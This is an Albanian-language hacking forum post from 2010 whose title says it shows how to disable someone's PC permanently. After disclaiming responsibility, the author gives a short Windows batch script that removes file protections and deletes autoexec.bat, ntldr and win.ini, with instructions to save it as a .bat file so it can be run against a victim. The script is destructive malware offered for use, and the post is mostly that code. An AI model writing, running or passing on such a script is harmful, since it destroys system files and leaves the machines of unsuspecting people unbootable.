ForumForum  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Fikja Dikujna Per Gjithmon PC`n

Shko poshtë 
AutoriMesazh
Grannqe
WebMaster
WebMaster


Posts : 321
Join date : 12/01/2010

MesazhTitulli: Fikja Dikujna Per Gjithmon PC`n   Wed Jan 13, 2010 9:15 am

fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju. HAPIM notepadin dhe vendosim ket kod: @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini e ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://gea-hacking.canadian-forum.com
 
Fikja Dikujna Per Gjithmon PC`n
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Gea - Group (Grannqe - Enis - Atdhe) - Protected By OpojaHackersGroup :: Hacking-
Kërce tek: